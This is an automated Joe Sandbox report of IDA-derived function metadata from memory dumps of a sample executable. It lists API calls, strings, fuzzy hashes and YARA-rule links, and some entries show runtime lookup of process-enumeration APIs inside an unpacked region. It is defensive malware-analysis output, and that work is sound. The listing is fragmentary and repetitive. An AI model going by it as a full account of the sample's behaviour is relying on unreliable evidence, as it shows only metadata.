Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset$H_prolog_malloc_realloc
String ID:
API String ID: 1826288403-3916222277
Opcode ID: b45412dfc1ea75b9c5487e1250868b71b65e2f846972b0943a4e5d2381a8cdf9
Instruction ID: 67b56e6fd5b49c4b91de99ed37ec21efa0c0af2c050572a8eecd629133f7ed59
Opcode Fuzzy Hash: b45412dfc1ea75b9c5487e1250868b71b65e2f846972b0943a4e5d2381a8cdf9
Instruction Fuzzy Hash: CCE1A071A00B45DFDB14EF64C890BEAB7B1FF48308F10482EE956A7281D778A991CB59

Function 004181AF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004182A1
_wcscpy.LIBCMT ref: 004182F1
_wcscpy.LIBCMT ref: 00418395

Strings

T, xrefs: 00418353

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy
String ID: T
API String ID: 3048848545-3187964512
Opcode ID: 2e5b9b3d5d71fa1e94147d15f4028b27beccdfefe5cdf68f9bf76e7ae5596274
Instruction ID: e309697e00dd7c7fc65afc2b2571d4ca809195f729a0fef38a9928ffc702c386
Opcode Fuzzy Hash: 2e5b9b3d5d71fa1e94147d15f4028b27beccdfefe5cdf68f9bf76e7ae5596274
Instruction Fuzzy Hash: 91812A71904708EFDB25DF64C884BEEB7E8AF05304F04416FE95997281DF786A84CB69

Function 022AF734 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 022AF8EA

Part of subcall function 022A798A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 022A79BC

__freea.LIBCMT ref: 022AF8F3
__freea.LIBCMT ref: 022AF916

Strings

kL, xrefs: 022AF73B

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID: kL
API String ID: 2243444508-2496334608
Opcode ID: 49ee4860c61bc9f464f2fd3324729da46c3e455319bce4b585c23a614e637658
Instruction ID: 464293032151da999f19bc54c2b13d30abaaf43223a69415b5320207754ef80f
Opcode Fuzzy Hash: 49ee4860c61bc9f464f2fd3324729da46c3e455319bce4b585c23a614e637658
Instruction Fuzzy Hash: C851C572520317AFDB215EE4CD60EAB36AAEF44754F65012AFC0497D48EB7ADC11CB90

Function 022A0770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 022A07AF
__IsNonwritableInCurrentImage.LIBCMT ref: 022A0863

Strings

csm, xrefs: 022A084D
kL, xrefs: 022A0822, 022A089F

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$kL
API String ID: 3480331319-4174319936
Opcode ID: 28fb56188ec0dc00d3ca9edd4eaf348d988a6cc7f040d49a53cb7e0785acc7cc
Instruction ID: 32aa09d182fbfc09aa4e4e36306b952d378e257e07e0d74f8e92f65688d9c80d
Opcode Fuzzy Hash: 28fb56188ec0dc00d3ca9edd4eaf348d988a6cc7f040d49a53cb7e0785acc7cc
Instruction Fuzzy Hash: 0141B130E20309AFCF00DFA8C8A4BAEBBA5AF45318F448195E8189B759D7719B15CFD5

Function 00406666 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040666B
_wcscpy.LIBCMT ref: 004066A1

Strings

:, xrefs: 004066CF
lB, xrefs: 004066DB

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog_wcscpy
String ID: :$lB
API String ID: 2825759377-3626491908
Opcode ID: fff6dfd80e9f4094c82248fe7762a2aa2abcb5d553b30a5ca41e08294bf9f759
Instruction ID: 13b9769822bee8234e33102bf284fad2086586d4dca29c43877cd0c27cfb6428
Opcode Fuzzy Hash: fff6dfd80e9f4094c82248fe7762a2aa2abcb5d553b30a5ca41e08294bf9f759
Instruction Fuzzy Hash: F7418E71801518AADB21EB61DC51AEEB37CAF01348F0040AFF556731C5DB786F88CE69

Function 0040D894 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040D922

Part of subcall function 0040CE40: SelectObject.GDI32(00000000,?), ref: 0040CEA6
Part of subcall function 0040CE40: SelectObject.GDI32(?,?), ref: 0040CEB1
Part of subcall function 0040CE40: SelectObject.GDI32(00000000,?), ref: 0040CED9
Part of subcall function 0040CE40: SelectObject.GDI32(?,?), ref: 0040CEE1
Part of subcall function 0040CE40: DeleteDC.GDI32(00000000), ref: 0040CEEA
Part of subcall function 0040CE40: DeleteDC.GDI32(?), ref: 0040CEEF

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040D958
DeleteObject.GDI32(00000000), ref: 0040D963

Strings

STATIC, xrefs: 0040D8F3

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: Object$Select$Delete$MessageSend
String ID: STATIC
API String ID: 3221445509-1882779555
Opcode ID: 7ef77dc3baced7abcca8270526c810ef52559ad7408dd7420e3e787d639df2dc
Instruction ID: c9bad0333bcb60b9f0b690c7e64e6ed1e56a0dea592df98fcb5495743a4e6f69
Opcode Fuzzy Hash: 7ef77dc3baced7abcca8270526c810ef52559ad7408dd7420e3e787d639df2dc
Instruction Fuzzy Hash: EA21DA72541104BAEB21ABA5CC82FFF7369AF41B54F104136F900771C1DB7C99469ABD

Function 004220E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 004220F8

Part of subcall function 0042140C: __setmbcp.LIBCMT ref: 00421417

_parse_cmdline.LIBCMT ref: 0042213A
_parse_cmdline.LIBCMT ref: 0042217B

Strings

C:\Users\user\Desktop\hkpqXovZtS.exe, xrefs: 00422102, 00422107

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _parse_cmdline$___initmbctable__setmbcp
String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
API String ID: 1290970244-979263065
Opcode ID: 130a18c786c0c55605ed0c68f1cf483022f01e30eca0087883a58cb70d492ffd
Instruction ID: 2a6882aae0e60c19258fb6b8e9a46bb5ab1bc2fc0a32b81eb419a24eaa387be9
Opcode Fuzzy Hash: 130a18c786c0c55605ed0c68f1cf483022f01e30eca0087883a58cb70d492ffd
Instruction Fuzzy Hash: 81212771B001B8BBCB10DBA5BE80C9E7BB9FA42324760067BF610E3250D674AE55C75D

Function 0040829E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004082B0
_wcslen.LIBCMT ref: 004082D2
_swprintf.LIBCMT ref: 00408324

Strings

%.*ls(%u)%ls, xrefs: 004082F9, 0040831B

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen$_swprintf
String ID: %.*ls(%u)%ls
API String ID: 120243331-2527286751
Opcode ID: 5aafee10f6c8830377de15d62b46ff065d13fc8eee9447b553876fc619cfb0d2
Instruction ID: dfd658a5abba8a3b166b0e543c1e19f029f64ed096bbde68f5115233caa860ba
Opcode Fuzzy Hash: 5aafee10f6c8830377de15d62b46ff065d13fc8eee9447b553876fc619cfb0d2
Instruction Fuzzy Hash: 2A11B772C00118BACF11AAA5CD409EFBB7CFF85705F1040BBF844B3151DB799A859B98

Function 004067F5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004067FA

Part of subcall function 00402BA4: __EH_prolog.LIBCMT ref: 00402BA9

Part of subcall function 00406550: GetLastError.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000000,00000020,?), ref: 004065A5
Part of subcall function 00406550: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00000020,?), ref: 004065B4

Strings

SeSecurityPrivilege, xrefs: 00406830
SeRestorePrivilege, xrefs: 00406845
lB, xrefs: 0040688C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog$CloseErrorHandleLast
String ID: SeRestorePrivilege$SeSecurityPrivilege$lB
API String ID: 2025198869-2145591228
Opcode ID: 6f7403409e7457e70ef40132f06063f7c188e8caac060c7ed8b7e470c00eaa4f
Instruction ID: caf21e769f74be6263a2fd3c3f4a3fe2d43f7bfc576c3d9522a3ce941ddb484d
Opcode Fuzzy Hash: 6f7403409e7457e70ef40132f06063f7c188e8caac060c7ed8b7e470c00eaa4f
Instruction Fuzzy Hash: 2D112472E00214EADF21BF96A8416EE7B65AF04308F50803FF415B72C2C7BD09508759

Function 0040DE9D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,?,0040D189,?,?), ref: 0040DF17

Strings

2C, xrefs: 0040DEB9
2C, xrefs: 0040DF55
GETPASSWORD1, xrefs: 0040DF0C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: DialogParam
String ID: 2C$2C$GETPASSWORD1
API String ID: 665744214-4112161682
Opcode ID: 317ad0b5af315d12eb810c31ae02d5b1f30821c7d872744a7df516915106c975
Instruction ID: 2a2c85addaa01aa2a96c8be4e68bf16374466eaab05288000d7c3937cded2372
Opcode Fuzzy Hash: 317ad0b5af315d12eb810c31ae02d5b1f30821c7d872744a7df516915106c975
Instruction Fuzzy Hash: B1113331A00245ABDB22DFA1EC81B9B3B54AB08754F19407BF9457B2C1C6B89C88CB6C

Function 022968BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 02296943

Strings

D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c, xrefs: 022968C1, 022968D5, 022968F2
!(Operand->Length & 1), xrefs: 022968F3
X86Instruction->HasSrcAddressing, xrefs: 022968D6

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: __fprintf_l
String ID: !(Operand->Length & 1)$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$X86Instruction->HasSrcAddressing
API String ID: 3906573944-1747295944
Opcode ID: 2316bee954fb8086a784b3f5459b5452e9fabfe29ea20cdc8d8f9314263f10d6
Instruction ID: 2e373037f1aad3b2397448098fb8a9d03c55be29adc1db2e8e58974b8a08aab5
Opcode Fuzzy Hash: 2316bee954fb8086a784b3f5459b5452e9fabfe29ea20cdc8d8f9314263f10d6
Instruction Fuzzy Hash: 31213571118B546BD3128BF9C800BE7FBDDAF55704F08845DF0EA42185D7B4A69487A1

Function 022A7F18 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 022A7F3D
GetLastError.KERNEL32 ref: 022A7F47
__dosmaperr.LIBCMT ref: 022A7F4E

Strings

kL, xrefs: 022A7F23

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: kL
API String ID: 4076908705-2496334608
Opcode ID: 6baf88851948b502d7dc262edad965363799b82d15d5263bc90baea72fc024d8
Instruction ID: 59e84c3ad420907985378fb63bea3f3d317dd375228016d591c1e6ab96fedda2
Opcode Fuzzy Hash: 6baf88851948b502d7dc262edad965363799b82d15d5263bc90baea72fc024d8
Instruction Fuzzy Hash: 57116971D5021CABCF20DFE8E89CBDEB7B9AF08300F1004D9E509E7240EA709A848F58

Function 0041D3EF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0041D402

Part of subcall function 0041D35D: ___BuildCatchObjectHelper.LIBCMT ref: 0041D393

_UnwindNestedFrames.LIBCMT ref: 0041D419
___FrameUnwindToState.LIBCMT ref: 0041D427

Strings

csm, xrefs: 0041D3FE, 0041D413, 0041D426, 0041D444, 0041D454

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 16657854b3cd878b95a5f81d302afa970bf1bd0cd37b0f7a20a120cf7e0cd8b9
Instruction ID: 30bcff710ff7c0a1abe62c389d305dd4474dfea62ac20d76bdcd90a92c219a18
Opcode Fuzzy Hash: 16657854b3cd878b95a5f81d302afa970bf1bd0cd37b0f7a20a120cf7e0cd8b9
Instruction Fuzzy Hash: 3F01E871800109BBDF125F52CC46EEB7F6AEF09358F048016FD2815161D73AE9B2DBA9

Function 00405E82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405E87
_memset.LIBCMT ref: 00405EC8
_memset.LIBCMT ref: 00405EE0

Strings

!o, xrefs: 00405E8F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset$H_prolog
String ID: !o
API String ID: 3013590873-3047423414
Opcode ID: 862cd3bdf951ad10f594a7ed736a6a4be3b1d350dd8bceeba34624881d60138b
Instruction ID: 5d6935f0de0eb6cb04ea44958b23cfc4f4aed1d0a722a788545b222460988c70
Opcode Fuzzy Hash: 862cd3bdf951ad10f594a7ed736a6a4be3b1d350dd8bceeba34624881d60138b
Instruction Fuzzy Hash: 63F090B1690B90BAD315EB19DC56FEF76ACEF80B05F00412FF155A62C0DBF82641CA98

Function 022A0E63 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,022A0E14,?,?,00000001,?,?,?,022A0F03,00000001,FlsFree,022B6CCC,FlsFree), ref: 022A0E70
GetLastError.KERNEL32(?,022A0E14,?,?,00000001,?,?,?,022A0F03,00000001,FlsFree,022B6CCC,FlsFree,?,?,022A0D1C), ref: 022A0E7A
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 022A0EA2

Strings

api-ms-, xrefs: 022A0E87

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9507339be5bbe050d8be976b2e0acf7055293a8585202048754273c38dbd9709
Instruction ID: 0b3ced87e4ae9be720c2f9e9ffff11c2ac8ba13e8e47d161c15b3cfca2777590
Opcode Fuzzy Hash: 9507339be5bbe050d8be976b2e0acf7055293a8585202048754273c38dbd9709
Instruction Fuzzy Hash: 4BE04830AE4305FBEF115AE1ED09B593B59AF10B42F144860F94DE44D8D771D5209554

Function 022A714E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,022A713D,022E4FE0,0000003F,00000000,022A15AA,?,022E4FE0,?,022A714A,00000000,00000000,00000000,00000000,00000000,022A8392), ref: 022A7150
GetCurrentProcess.KERNEL32(C0000417,0000003F,022E4FE0,00000218,00000000,?,00000000,?,0229187C,?,022E4FE0,00000000), ref: 022A7173
TerminateProcess.KERNEL32(00000000,?,0229187C,?,022E4FE0,00000000), ref: 022A717A

Strings

kL, xrefs: 022A715F

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate
String ID: kL
API String ID: 124695548-2496334608
Opcode ID: a3e39537a99342f08708cc2a5cda5f12cd5ecd821e092286330637012e27f6b7
Instruction ID: e2545c07546dfb19782355f437e96783aa2e23753f4b7a9086beffce189addb6
Opcode Fuzzy Hash: a3e39537a99342f08708cc2a5cda5f12cd5ecd821e092286330637012e27f6b7
Instruction Fuzzy Hash: 09D05E72ED4220F7E5116AF13C0EBEB2A2CAF09725F0508A0F609991C6DB5598958AA5

Function 00410B55 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00410BEC,?,?,00410CFB,?,?,?,?,?,00410D9A), ref: 00410B5B
GetLastError.KERNEL32(?,?,?,?,?,00410D9A), ref: 00410B67

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 00410B75
WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410B70

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d$lB
API String ID: 1091760877-176340684
Opcode ID: 1cc9f420c0a087eb6d48251363f8be5bd932ed32e1ae25e6f1639a372e61a46b
Instruction ID: d3de5011ed7e1e408f42325ffae576173026ee7bcf96c84a0b00da81f7f70057
Opcode Fuzzy Hash: 1cc9f420c0a087eb6d48251363f8be5bd932ed32e1ae25e6f1639a372e61a46b
Instruction Fuzzy Hash: 59D0C731B0842066D90036286C06E9E39005F02338BA20722F132642F2CB2C08A2429E

Function 0229103A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,Thread32Next), ref: 02291044
GetProcAddress.KERNEL32(00000000), ref: 0229104B

Strings

kernel32, xrefs: 0229103F
Thread32Next, xrefs: 0229103A

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Thread32Next$kernel32
API String ID: 1646373207-160946298
Opcode ID: b08af9780dbb6750c3f375065318915c95e4b63ef3af0634f793e8b137188a83
Instruction ID: b067934c8272bab17008867a18c776b2c9b2cef3fa1abe5bd512c3af4f35fe85
Opcode Fuzzy Hash: b08af9780dbb6750c3f375065318915c95e4b63ef3af0634f793e8b137188a83
Instruction Fuzzy Hash: 9CB09BB5DD075097AA16DBE1F80D54437546E047413000CD0F106C1108C6B454D4D610

Function 02291000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,CreateToolhelp32Snapshot), ref: 0229100A
GetProcAddress.KERNEL32(00000000), ref: 02291011

Strings

kernel32, xrefs: 02291005
CreateToolhelp32Snapshot, xrefs: 02291000

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

